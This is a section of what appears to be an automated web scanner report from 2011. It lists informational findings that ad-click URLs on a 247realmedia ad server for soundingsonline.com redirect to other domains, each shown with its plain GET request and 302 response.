20.422. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527036416/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527036416/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527036416/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527036416/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.423. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527433934/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527433934/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527433934/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527433934/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.424. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:09:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.425. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/537473796/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/537473796/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/537473796/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/537473796/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.426. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/543871127/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/543871127/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/543871127/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/543871127/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.427. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/551185722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/551185722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/551185722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/551185722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.428. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/559964392/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/559964392/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/559964392/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/559964392/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:24:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.429. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.430. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.431. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569227535/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569227535/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569227535/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569227535/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.432. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.433. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/577895125/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/577895125/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/577895125/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/577895125/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.434. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.435. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/590122297/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/590122297/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/590122297/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/590122297/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:05 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

